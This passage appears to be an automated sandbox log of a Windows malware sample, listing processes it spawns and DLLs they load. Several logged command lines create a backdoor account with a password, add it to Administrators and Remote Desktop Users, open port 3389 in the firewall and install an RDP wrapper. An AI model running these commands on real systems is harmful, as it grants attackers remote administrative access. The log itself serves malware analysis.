                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\IDBAFHDGDG.exe "C:\ProgramData\IDBAFHDGDG.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\GIIIIJDHJE.exe "C:\ProgramData\GIIIIJDHJE.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\AFHDGDGIID.exe "C:\ProgramData\AFHDGDGIID.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exitJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\IDBAFHDGDG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\GIIIIJDHJE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: apphelp.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: version.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: amsi.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: msasn1.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: gpapi.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: rasapi32.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: rasman.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: rtutils.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\AFHDGDGIID.exeSection loaded: winnsi.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
